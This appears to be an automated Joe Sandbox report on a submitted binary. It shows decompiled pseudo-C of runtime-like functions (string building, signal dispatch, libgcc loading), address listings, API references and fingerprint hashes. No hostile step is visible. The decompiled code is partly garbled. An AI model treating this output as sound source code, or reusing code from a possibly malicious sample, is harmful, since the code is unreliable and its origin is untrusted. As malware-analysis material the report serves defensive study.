									_t125 =  *((intOrPtr*)(_t191 + _t212));
									if(_t125 != 0) {
										_v56 = _t125;
										L01477900();
										_t191 =  *((intOrPtr*)(_t167 + 0x10));
									}
									_t212 = _t212 + 4;
								} while (_t212 != 0x18);
								if(_t191 != 0) {
									_v56 = _t191;
									L01477900();
								}
							}
							return _t125;
						} else {
							_v56 = _t115;
							 *_t225 = _t210;
							E01464DB0(_t167);
							_t215 =  *(_t167 + 4);
							_t137 =  *_t167;
							_t227 = _t225 - 8;
							_t202 =  &(_t215[1]);
							if(_v36 == _t137) {
								_t195 = 0xf;
							} else {
								_t195 =  *((intOrPtr*)(_t167 + 8));
							}
							if(_t195 < _t202) {
								_v48 = 1;
								_v52 = 0;
								_v56 = 0;
								 *_t227 = _t215;
								E01464F90(_t167);
								_t137 =  *_t167;
								_t225 = _t227 - 0x10;
							}
							 *((char*)(_t137 + _t215)) = 0x3d;
							 *(_t167 + 4) = _t202;
							 *((char*)( *_t167 +  &(_t215[1]))) = 0;
							_t216 =  *( *( *_a4 + 0x10));
							 *_t225 = _t216;
							_t143 = strlen(??);
							_t187 = 0x3fffffff -  *(_t167 + 4);
							if(0x3fffffff < _t143) {
								L33:
								 *_t225 = "basic_string::append";
								E014797B0(_t187, _t202);
								goto L34;
							} else {
								_v56 = _t143;
								 *_t225 = _t216;
								E01464DB0(_t167);
								_t225 = _t225 - 8;
								_t217 = 4;
								while(1) {
									_t204 =  *(_t167 + 4);
									_v32 =  &(_t204[1]);
									_t147 =  *_t167;
									if(_v36 == _t147) {
										_t197 = 0xf;
									} else {
										_t197 =  *((intOrPtr*)(_t167 + 8));
									}
									if(_t197 < _v32) {
										_v48 = 1;
										_v52 = 0;
										_v56 = 0;
										 *_t225 = _t204;
										E01464F90(_t167);
										_t147 =  *_t167;
										_t225 = _t225 - 0x10;
									}
									 *((char*)(_t147 + _t204)) = 0x3b;
									 *(_t167 + 4) = _v32;
									 *((char*)( *_t167 +  &(_t204[1]))) = 0;
									_t150 =  *0x14ad238; // 0x14ad160
									_t202 =  *(_t150 + _t217);
									 *_t225 = _t202;
									_t151 = strlen(??);
									_t187 = 0x3fffffff -  *(_t167 + 4);
									if(0x3fffffff < _t151) {
										break;
									}
									_v56 = _t151;
									 *_t225 = _t202;
									E01464DB0(_t167);
									_t205 =  *(_t167 + 4);
									_t228 = _t225 - 8;
									_v32 =  &(_t205[1]);
									_t155 =  *_t167;
									if(_v36 == _t155) {
										_t199 = 0xf;
									} else {
										_t199 =  *((intOrPtr*)(_t167 + 8));
									}
									if(_t199 < _v32) {
										_v48 = 1;
										_v52 = 0;
										_v56 = 0;
										 *_t228 = _t205;
										E01464F90(_t167);
										_t155 =  *_t167;
										_t225 = _t228 - 0x10;
									}
									 *((char*)(_t155 + _t205)) = 0x3d;
									 *(_t167 + 4) = _v32;
									 *((char*)( *_t167 +  &(_t205[1]))) = 0;
									_t202 = ( *( *_a4 + 0x10))[_t217];
									 *_t225 = _t202;
									_t162 = strlen(??);
									_t187 = 0x3fffffff -  *(_t167 + 4);
									if(0x3fffffff < _t162) {
										 *_t225 = "basic_string::append";
										E014797B0(_t187, _t202);
										break;
									} else {
										_v56 = _t162;
										 *_t225 = _t202;
										E01464DB0(_t167);
										_t217 = _t217 + 4;
										_t225 = _t225 - 8;
										if(_t217 == 0x18) {
											L8:
											return _t167;
										} else {
											continue;
										}
									}
									goto L77;
								}
								 *_t225 = "basic_string::append";
								E014797B0(_t187, _t202);
								goto L33;
							}
						}
					}
				}
				L77:
			}

0x013f0280
0x013f0281
0x013f0284
0x013f0286
0x013f0287
0x013f0289
0x013f028b
0x013f028e
0x013f0290
0x013f0296
0x013f029c
0x013f02a3
0x013f02a6
0x013f02aa
0x013f0520
0x013f0528
0x013f0530
0x013f0538
0x013f053f
0x00000000
0x013f02b0
0x013f02b0
0x013f02b7
0x013f02e6
0x013f02e6
0x013f02eb
0x013f02f0
0x013f02f6
0x013f02fa
0x013f0302
0x013f0309
0x013f030e
0x00000000
0x013f02b9
0x013f02b9
0x013f02bc
0x013f02c0
0x013f02c0
0x013f02c6
0x013f02ce
0x013f02d1
0x013f02d8
0x00000000
0x00000000
0x013f02dd
0x00000000
0x013f02df
0x013f02df
0x013f02e4
0x00000000
0x00000000
0x00000000
0x00000000
0x013f02e4
0x00000000
0x013f02dd
0x013f0320
0x013f0329
0x013f032e
0x013f0333
0x013f0336
0x013f0338
0x013f033b
0x013f0345
0x013f034a
0x013f05ae
0x013f05ae
0x013f05ba
0x014789f0
0x014789f5
0x014789f7
0x014789fa
0x014789fa
0x014789ff
0x01478a02
0x01478a08
0x01478a10
0x01478a12
0x01478a15
0x01478a15
0x01478a1a
0x01478a1e
0x01478a21
0x01478a24
0x01478a26
0x01478a26
0x01478a33
0x01478a38
0x01478a3d
0x01460e23
0x01460e23
0x01460e29
0x00000000
0x00000000
0x01460e2b
0x01460e30
0x01460e32
0x01460e39
0x01460f28
0x01460f2d
0x01460e3f
0x01460e3f
0x01460e45
0x01460e45
0x01460e4b
0x01460e4f
0x01460e57
0x01460f50
0x01460e5d
0x01460e5d
0x01460e60
0x01460e60
0x01460e57
0x01460e20
0x01460e20
0x01460e30
0x01460e72
0x01460e74
0x01460e77
0x01460e77
0x01460e7c
0x01460e81
0x01460e88
0x01460ee4
0x01460ee4
0x01460ee7
0x01460e8a
0x01460e8a
0x01460e9b
0x01460e9b
0x01460ea0
0x01460ea2
0x01460ea9
0x01460f40
0x01460f45
0x01460eaf
0x01460eaf
0x01460eb5
0x01460eb5
0x01460ebb
0x01460ebf
0x01460ec7
0x01460f60
0x01460ecd
0x01460ecd
0x01460ed0
0x01460ed0
0x01460ec7
0x01460e90
0x01460e90
0x01460e93
0x01460e96
0x01460ee2
0x00000000
0x00000000
0x01460ee2
0x01460e88
0x01460eec
0x01460eef
0x01460ef3
0x01460ef8
0x01460ef8
0x01460efd
0x01460eff
0x01460f02
0x01460f07
0x01460f07
0x01460f0a
0x01460f0d
0x01460f14
0x01460f16
0x01460f19
0x01460f19
0x01460f14
0x01460f23
0x013f0350
0x013f0350
0x013f0356
0x013f0359
0x013f035e
0x013f0361
0x013f0363
0x013f0366
0x013f036c
0x013f0580
0x013f0372
0x013f0372
0x013f0372
0x013f0377
0x013f0550
0x013f055a
0x013f0562
0x013f056a
0x013f056d
0x013f0572
0x013f0574
0x013f0574
0x013f037d
0x013f0383
0x013f0386
0x013f0393
0x013f0395
0x013f0398
0x013f03a2
0x013f03a7
0x013f05a2
0x013f05a2
0x013f05a9
0x00000000
0x013f03ad
0x013f03ad
0x013f03b3
0x013f03b6
0x013f03bb
0x013f03be
0x013f0485
0x013f0485
0x013f048b
0x013f048e
0x013f0493
0x013f0510
0x013f0495
0x013f0495
0x013f0495
0x013f049d
0x013f04a3
0x013f04ad
0x013f04b5
0x013f04bd
0x013f04c0
0x013f04c5
0x013f04c7
0x013f04c7
0x013f03d0
0x013f03d7
0x013f03dc
0x013f03e1
0x013f03e6
0x013f03e9
0x013f03ec
0x013f03f6
0x013f03fb
0x00000000
0x00000000
0x013f0401
0x013f0407
0x013f040a
0x013f040f
0x013f0412
0x013f0418
0x013f041b
0x013f0420
0x013f0500
0x013f0426
0x013f0426
0x013f0426
0x013f042e
0x013f04d0
0x013f04da
0x013f04e2
0x013f04ea
0x013f04ed
0x013f04f2
0x013f04f4
0x013f04f4
0x013f0434
0x013f043b
0x013f0440
0x013f044d
0x013f0450
0x013f0453
0x013f045d
0x013f0462
0x013f058a
0x013f0591
0x00000000
0x013f0468
0x013f0468
0x013f046e
0x013f0471
0x013f0476
0x013f0479
0x013f047f
0x013f0311
0x013f031a
0x00000000
0x00000000
0x00000000
0x013f047f
0x00000000
0x013f0462
0x013f0596
0x013f059d
0x00000000
0x013f059d
0x013f03a7
0x013f034a
0x013f02b7
0x00000000

APIs

strcmp.MSVCRT ref: 013F02D1
strlen.MSVCRT ref: 013F02EB
strlen.MSVCRT ref: 013F033B
strlen.MSVCRT ref: 013F0398
strlen.MSVCRT ref: 013F03EC

Strings

*, xrefs: 013F0520
basic_string::append, xrefs: 013F058A, 013F0596, 013F05A2, 013F05AE

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: strlen$strcmp
String ID: *$basic_string::append
API String ID: 551667898-3732199748
Opcode ID: 6a27ad50f49a7f348a6d26330066205944947c8f531068af9924d5b087f9c7ff
Instruction ID: c27d193b9499df00417eb4e3701ab52e8b5f6c15ed0e56e73a77abb3f5d9e7b5
Opcode Fuzzy Hash: 6a27ad50f49a7f348a6d26330066205944947c8f531068af9924d5b087f9c7ff
Instruction Fuzzy Hash: B4A17BB0A08202CFCB04EF2CC18476EBBF2AF54318F45856EE5989B355DB75D845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 014663D0 Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 0146646F
memmove.MSVCRT ref: 014664D3
memmove.MSVCRT ref: 0146650B
memcpy.MSVCRT ref: 0146657A

Strings

basic_string::_M_replace, xrefs: 014666FF

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: 39131163bbc32397deee00d41318df5c2cfac830d8168f00d393e7aebb60742d
Instruction ID: fb89b73af4aeb759feffb8bffde178da47442b304314618f0a2a851832d490d5
Opcode Fuzzy Hash: 39131163bbc32397deee00d41318df5c2cfac830d8168f00d393e7aebb60742d
Instruction Fuzzy Hash: 6B9105756083518FC714DF28C08082EFBE6BF88758F06892EE5899B324E774E945CB87

Uniqueness

Uniqueness Score: -1.00%

Function 013D5990 Relevance: 12.1, APIs: 8, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E013D5990(signed int** _a4) {
				intOrPtr _v24;
				signed int** _t25;
				intOrPtr* _t26;

				_t26 =  &_v24;
				_t25 = _a4;
				_t12 =  *( *_t25);
				if(_t12 <= 0xc0000091) {
					if(_t12 >= 0xc000008d) {
						L20:
						_v24 = 0;
						 *_t26 = 8;
						L013E43E8();
						if(_t12 != 1) {
							L18:
							if(_t12 == 0) {
								L4:
								_t12 =  *0x14f2078;
								if( *0x14f2078 == 0) {
									return 0;
								}
								_a4 = _t25;
								_t26 = _t26 + 0x18;
								_pop(_t25);
								goto __eax;
							}
							 *_t26 = 8;
							 *_t12();
							return 0xffffffff;
						}
						_v24 = 1;
						 *_t26 = 8;
						L013E43E8();
						E013D5490(_t12);
						return 0xffffffff;
					}
					if(_t12 != 0xc0000005) {
						if(_t12 != 0xc000001d) {
							goto L4;
						}
						L12:
						_v24 = 0;
						 *_t26 = 4;
						L013E43E8();
						if(_t12 == 1) {
							_v24 = 1;
							 *_t26 = 4;
							L013E43E8();
							return _t12 | 0xffffffff;
						}
						if(_t12 == 0) {
							goto L4;
						}
						 *_t26 = 4;
						 *_t12();
						return 0xffffffff;
					}
					_v24 = 0;
					 *_t26 = 0xb;
					L013E43E8();
					if(_t12 == 1) {
						_v24 = 1;
						 *_t26 = 0xb;
						L013E43E8();
						return _t12 | 0xffffffff;
					}
					if(_t12 == 0) {
						goto L4;
					}
					 *_t26 = 0xb;
					 *_t12();
					return 0xffffffff;
				}
				if(_t12 == 0xc0000094) {
					_v24 = 0;
					 *_t26 = 8;
					L013E43E8();
					if(_t12 == 1) {
						_v24 = 1;
						 *_t26 = 8;
						L013E43E8();
						return 0xffffffff;
					}
					goto L18;
				}
				if(_t12 == 0xc0000096) {
					goto L12;
				}
				if(_t12 == 0xc0000093) {
					goto L20;
				}
				goto L4;
			}

0x013d5991
0x013d5994
0x013d599a
0x013d59a1
0x013d59e5
0x013d5aa1
0x013d5aa1
0x013d5aa9
0x013d5ab0
0x013d5ab8
0x013d5a89
0x013d5a8b
0x013d59c0
0x013d59c0
0x013d59c7
0x00000000
0x013d5a60
0x013d59cd
0x013d59d1
0x013d59d4
0x013d59d5
0x013d59d5
0x013d5a91
0x013d5a98
0x00000000
0x013d5a9a
0x013d5aba
0x013d5ac2
0x013d5ac9
0x013d5ace
0x00000000
0x013d5ad3
0x013d59f0
0x013d5a28
0x00000000
0x00000000
0x013d5a2a
0x013d5a2a
0x013d5a32
0x013d5a39
0x013d5a41
0x013d5afe
0x013d5b06
0x013d5b0d
0x00000000
0x013d5b12
0x013d5a49
0x00000000
0x00000000
0x013d5a4f
0x013d5a56
0x00000000
0x013d5a58
0x013d59f2
0x013d59fa
0x013d5a01
0x013d5a09
0x013d5b1a
0x013d5b22
0x013d5b29
0x00000000
0x013d5b2e
0x013d5a11
0x00000000
0x00000000
0x013d5a13
0x013d5a1a
0x00000000
0x013d5a1c
0x013d59a8
0x013d5a70
0x013d5a78
0x013d5a7f
0x013d5a87
0x013d5ae0
0x013d5ae8
0x013d5aef
0x00000000
0x013d5af4
0x00000000
0x013d5a87
0x013d59b3
0x00000000
0x00000000
0x013d59ba
0x00000000
0x00000000
0x00000000

APIs

signal.MSVCRT ref: 013D5A01
signal.MSVCRT ref: 013D5A39
signal.MSVCRT ref: 013D5A7F
signal.MSVCRT ref: 013D5AB0
signal.MSVCRT ref: 013D5AC9

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: dc141b35fc97becd7481c14827e25356ff209ef62d31ff8a8a10854049fcaea8
Instruction ID: 573c4ad7f778a2a3bf76095b21ebd5b895a8600d91cf5414fa26b6abf7f05b62
Opcode Fuzzy Hash: dc141b35fc97becd7481c14827e25356ff209ef62d31ff8a8a10854049fcaea8
Instruction Fuzzy Hash: 16311C729097218AF7216F6C948432E7AF4BF4632CF564A0AE5E4CB2D0D7B9C5848B53

Uniqueness

Uniqueness Score: -1.00%

Function 013D97B0 Relevance: 12.1, APIs: 8, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E013D97B0(void* __ecx, CHAR* _a4, intOrPtr _a8, signed int _a12) {
				void* _v16;
				char _v32;
				char _v36;
				char* _v100;
				void* __ebx;
				signed char _t24;
				signed int _t30;
				signed int _t35;
				struct HINSTANCE__* _t36;
				_Unknown_base(*)()* _t37;
				struct HINSTANCE__* _t40;
				_Unknown_base(*)()* _t41;
				CHAR* _t42;
				struct HINSTANCE__* _t43;
				void* _t45;
				void* _t46;
				intOrPtr _t47;
				char _t49;
				intOrPtr _t50;
				intOrPtr _t51;
				signed int _t53;
				_Unknown_base(*)()* _t54;
				signed int _t55;
				void* _t57;
				intOrPtr* _t58;
				char** _t60;
				char** _t61;
				struct HINSTANCE__** _t63;
				struct HINSTANCE__** _t64;

				_t58 = _t57 - 0x2c;
				_t51 = _a8;
				_t42 = _a4;
				_t53 = _a12;
				_t24 = E013D91E0(_t51 + 4 -  *((intOrPtr*)(_t51 + 4)));
				_t45 = _t51 + 8;
				_t55 = _t24 & 0x000000ff;
				if(_t24 == 0xff) {
					L22:
					goto L11;
				} else {
					__eax = __eax & 0x00000070;
					__eflags = __al - 0x20;
					if(__eflags == 0) {
						__edx =  *((intOrPtr*)(__ebx + 4));
						goto L11;
					} else {
						if(__eflags <= 0) {
							goto L22;
						} else {
							__eflags = __al - 0x30;
							if(__al != 0x30) {
								__eflags = __al - 0x50;
								if(__al != 0x50) {
									goto L27;
								} else {
									goto L22;
								}
							} else {
								__edx =  *((intOrPtr*)(__ebx + 8));
								L11:
								 *_t58 =  &_v36;
								E013D9050(_t55, _t45, 0);
								_t30 = E013D91E0(_t53 + 4 -  *((intOrPtr*)(_t53 + 4)));
								_t46 = _t53 + 8;
								_t53 = _t30 & 0x000000ff;
								__eflags = _t30 - 0xff;
								if(_t30 == 0xff) {
									L20:
									_t49 = 0;
									goto L16;
								} else {
									_t35 = _t30 & 0x00000070;
									__eflags = _t35 - 0x20;
									if(__eflags == 0) {
										_t49 = _t42[4];
										goto L16;
									} else {
										if(__eflags <= 0) {
											goto L20;
										} else {
											__eflags = _t35 - 0x30;
											if(_t35 != 0x30) {
												__eflags = _t35 - 0x50;
												if(_t35 != 0x50) {
													L27:
													abort();
													abort();
													abort();
													abort();
													abort();
													abort();
													abort();
													abort();
													_push(_t55);
													_push(_t51);
													_push(_t53);
													_t60 = _t58 - 0x1c;
													 *_t60 = "libgcc_s_dw2-1.dll";
													_t36 = GetModuleHandleA(_t42);
													_t61 = _t60 - 4;
													if(_t36 == 0) {
														_t37 = 0x13dae40;
														_t54 = E013DA660;
													} else {
														_t43 = _t36;
														 *_t61 = "libgcc_s_dw2-1.dll";
														_t40 = LoadLibraryA(??);
														_t63 = _t61 - 4;
														 *0x14f2020 = _t40;
														_v100 = "__register_frame_info";
														 *_t63 = _t43;
														_t41 = GetProcAddress(??, ??);
														_t64 = _t63 - 8;
														_t54 = _t41;
														_v100 = "__deregister_frame_info";
														 *_t64 = _t43;
														_t37 = GetProcAddress(??, ??);
														_t61 = _t64 - 8;
													}
													 *0x1481004 = _t37;
													if(_t54 != 0) {
														_v100 = 0x14f2024;
														 *_t61 = 0x14b3104;
														 *_t54();
													}
													 *_t61 = E013C1560;
													return E013C14A0();
												} else {
													goto L20;
												}
											} else {
												_t49 = _t42[8];
												L16:
												 *_t58 =  &_v32;
												E013D9050(_t53, _t46, _t49);
												_t47 = _v36;
												_t50 = _v32;
												__eflags = _t50 - _t47;
												if(_t50 >= _t47) {
													__eflags = _t47 - _t50;
													asm("sbb eax, eax");
												}
												return 1;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x013d97b4
0x013d97b7
0x013d97bb
0x013d97bf
0x013d97c9
0x013d97ce
0x013d97d1
0x013d97d6
0x013d9864
0x00000000
0x013d97dc
0x013d97dc
0x013d97df
0x013d97e1
0x013d9870
0x00000000
0x013d97e7
0x013d97e7
0x00000000
0x013d97e9
0x013d97e9
0x013d97eb
0x013d9860
0x013d9862
0x00000000
0x00000000
0x00000000
0x00000000
0x013d97ed
0x013d97ed
0x013d97f0
0x013d97f4
0x013d97f9
0x013d9804
0x013d9809
0x013d980c
0x013d980f
0x013d9811
0x013d985c
0x013d985c
0x00000000
0x013d9813
0x013d9813
0x013d9816
0x013d9818
0x013d9880
0x00000000
0x013d981a
0x013d981a
0x00000000
0x013d981c
0x013d981c
0x013d981e
0x013d9858
0x013d985a
0x0147aa53
0x0147aa53
0x0147aa58
0x0147aa5d
0x0147aa62
0x0147aa67
0x0147aa6c
0x0147aa71
0x0147aa76
0x013c14c0
0x013c14c3
0x013c14c4
0x013c14c6
0x013c14c9
0x013c14d0
0x013c14d6
0x013c14db
0x013c1550
0x013c1555
0x013c14dd
0x013c14dd
0x013c14df
0x013c14e6
0x013c14f2
0x013c14f5
0x013c14fa
0x013c1502
0x013c1505
0x013c1507
0x013c150a
0x013c150c
0x013c1514
0x013c1517
0x013c1519
0x013c1519
0x013c151c
0x013c1523
0x013c1525
0x013c152d
0x013c1534
0x013c1534
0x013c1536
0x013c1549
0x00000000
0x00000000
0x00000000
0x013d9820
0x013d9820
0x013d9828
0x013d982c
0x013d9831
0x013d9836
0x013d983a
0x013d9843
0x013d9845
0x013d9847
0x013d9849
0x013d9849
0x013d9852
0x013d9852
0x013d981e
0x013d981a
0x013d9818
0x013d9811
0x013d97eb
0x013d97e7
0x013d97e1

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 820eaf1312fb82ee6424859988b98bf9e7a7c94c09288e2cab552f9547e36843
Instruction ID: b2a63716cf03ec38e2bdd1ae12f1ad61e90e017ee2ce0118d4e88347b854232b
Opcode Fuzzy Hash: 820eaf1312fb82ee6424859988b98bf9e7a7c94c09288e2cab552f9547e36843
Instruction Fuzzy Hash: A021DA3390420ECFDB14DE2DE4827AEBBAAEB9561CB04851AC49957209D230E88BC795

Uniqueness

Uniqueness Score: -1.00%

Function 013F05D0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 211
stringCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E013F05D0(signed int* __ecx, intOrPtr* _a4) {
				void* _v16;
				char _v29;
				char* _v48;
				intOrPtr _v64;
				intOrPtr _v68;
				int _v72;
				char* _v76;
				void* _v88;
				void* _v100;
				void* _v112;
				void* __edi;
				void* __ebp;
				intOrPtr _t79;
				int _t88;
				intOrPtr* _t90;
				int _t91;
				signed int _t93;
				signed int _t96;
				int _t100;
				signed int _t102;
				signed int _t104;
				intOrPtr _t105;
				int _t106;
				signed int _t108;
				signed int _t111;
				int _t115;
				signed int _t119;
				signed int _t122;
				intOrPtr _t139;
				intOrPtr _t141;
				char* _t143;
				intOrPtr _t146;
				char* _t147;
				intOrPtr _t150;
				char** _t151;
				intOrPtr _t152;
				char* _t153;
				char* _t154;
				char* _t155;
				char* _t156;
				signed int _t157;
				intOrPtr _t158;
				char* _t159;
				char* _t160;
				void* _t161;
				void* _t162;
				void* _t163;
				void* _t164;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				void* _t172;

				_t124 = __ecx;
				_t164 = _t163 - 0x3c;
				_t79 = E01438880(0, 0,  &_v29);
				 *((intOrPtr*)(__ecx)) = _t79;
				_t151 =  *( *_a4 + 0x10);
				_t143 =  *_t151;
				if(_t143 == 0) {
					_v64 = 0x2a;
					_v68 = 1;
					_v76 = 0;
					_v72 =  *((intOrPtr*)(_t79 - 0xc));
					E01438DA0(__ecx, _t162);
					return __ecx;
				} else {
					if(_t151[1] == 0) {
						L6:
						_v76 = _t143;
						_v48 = _t143;
						_v72 = strlen(??);
						_v76 = _v48;
						E01439970(_t124, _t151, _t162);
						return _t124;
					} else {
						_v48 = _t143;
						_t157 = 0;
						while(1) {
							_t157 = _t157 + 1;
							_t88 = strcmp( *(_t151 + _t157 * 4 - 4), _t151[_t157]);
							if(_t88 != 0) {
								break;
							}
							if(_t157 <= 4) {
								continue;
							} else {
								_t143 = _v48;
								if(_t88 != 0) {
									break;
								} else {
									goto L6;
								}
							}
							goto L29;
						}
						_v76 = 0x80;
						E0143A8F0(_t124);
						_t90 =  *0x14ad238; // 0x14ad160
						_t169 = _t164 - 4;
						_t158 =  *_t90;
						 *_t169 = _t158;
						_t91 = strlen(??);
						 *_t169 = _t158;
						_v76 = _t91;
						E014395B0(_t124);
						_t93 =  *_t124;
						_t170 = _t169 - 8;
						_t152 =  *((intOrPtr*)(_t93 - 0xc));
						_t159 = _t152 + 1;
						if( *((intOrPtr*)(_t93 - 8)) < _t159) {
							L11:
							_v76 = _t159;
							E0143A8F0(_t124);
							_t170 = _t170 - 4;
						} else {
							_t150 =  *0x14a31d0; // 0x2
							if(_t150 != 0) {
								_t122 =  *(_t93 - 4) & 0xffffff00 |  *(_t93 - 4) > 0x00000000;
							} else {
								_t122 =  *(_t93 - 4) & 0xffffff00 |  *(_t93 - 4) > 0x00000000;
							}
							if(_t122 != 0) {
								goto L11;
							}
						}
						 *((char*)( *_t124 +  *((intOrPtr*)( *_t124 - 0xc)))) = 0x3d;
						_t96 =  *_t124;
						 *((intOrPtr*)(_t96 - 0xc)) = _t159;
						 *((intOrPtr*)(_t96 - 4)) = 0;
						 *((char*)(_t96 + _t152 + 1)) = 0;
						_t160 =  *( *( *_a4 + 0x10));
						_t100 = strlen(_t160);
						_v76 = _t160;
						_v72 = _t100;
						E014395B0(_t124);
						_t171 = _t170 - 8;
						_t161 = 4;
						do {
							_t102 =  *_t124;
							_t146 =  *((intOrPtr*)(_t102 - 0xc));
							_t153 = _t146 + 1;
							if( *((intOrPtr*)(_t102 - 8)) < _t153) {
								L16:
								_v76 = _t153;
								E0143A8F0(_t124);
								_t102 =  *_t124;
								_t171 = _t171 - 4;
								_t146 =  *((intOrPtr*)(_t102 - 0xc));
							} else {
								_t139 =  *0x14a31d0; // 0x2
								if(_t139 != 0) {
									if( *((intOrPtr*)(_t102 - 4)) > 0) {
										goto L16;
									} else {
										_t102 =  *_t124;
										_t146 =  *((intOrPtr*)(_t102 - 0xc));
										goto L17;
									}
									break;
								} else {
									if( *((intOrPtr*)(_t102 - 4)) > 0) {
										goto L16;
									}
								}
							}
							L17:
							 *((char*)(_t102 + _t146)) = 0x3b;
							_t104 =  *_t124;
							 *((intOrPtr*)(_t104 - 0xc)) = _t153;
							 *((intOrPtr*)(_t104 - 4)) = 0;
							 *((char*)(_t104 + _t153)) = 0;
							_t105 =  *0x14ad238; // 0x14ad160
							_t154 =  *(_t105 + _t161);
							_t106 = strlen(_t154);
							_v76 = _t154;
							_v72 = _t106;
							E014395B0(_t124);
							_t108 =  *_t124;
							_t172 = _t171 - 8;
							_t147 =  *((intOrPtr*)(_t108 - 0xc));
							_v48 = _t147;
							_t155 = _t147 + 1;
							if( *((intOrPtr*)(_t108 - 8)) < _t155) {
								L21:
								_v76 = _t155;
								E0143A8F0(_t124);
								_t172 = _t172 - 4;
							} else {
								_t141 =  *0x14a31d0; // 0x2
								if(_t141 != 0) {
									_t119 =  *(_t108 - 4) & 0xffffff00 |  *(_t108 - 4) > 0x00000000;
								} else {
									_t119 = _t108 & 0xffffff00 |  *(_t108 - 4) > 0x00000000;
								}
								if(_t119 != 0) {
									goto L21;
								}
							}
							 *((char*)( *_t124 +  *((intOrPtr*)( *_t124 - 0xc)))) = 0x3d;
							_t111 =  *_t124;
							 *((intOrPtr*)(_t111 - 0xc)) = _t155;
							 *((intOrPtr*)(_t111 - 4)) = 0;
							( &(_v48[1]))[_t111] = 0;
							_t156 =  *( *( *_a4 + 0x10) + _t161);
							_t115 = strlen(_t156);
							_v76 = _t156;
							_v72 = _t115;
							E014395B0(_t124);
							_t161 = _t161 + 4;
							_t171 = _t172 - 8;
						} while (_t161 != 0x18);
						return _t124;
					}
				}
				L29:
			}

0x013f05d9
0x013f05db
0x013f05f1
0x013f05f9
0x013f05fd
0x013f0600
0x013f0604
0x013f0850
0x013f085a
0x013f0865
0x013f086c
0x013f0870
0x013f0881
0x013f060a
0x013f060f
0x013f0646
0x013f0646
0x013f0649
0x013f0653
0x013f065a
0x013f065d
0x013f066e
0x013f0611
0x013f0611
0x013f0614
0x013f0620
0x013f0620
0x013f0631
0x013f0638
0x00000000
0x00000000
0x013f063d
0x00000000
0x013f063f
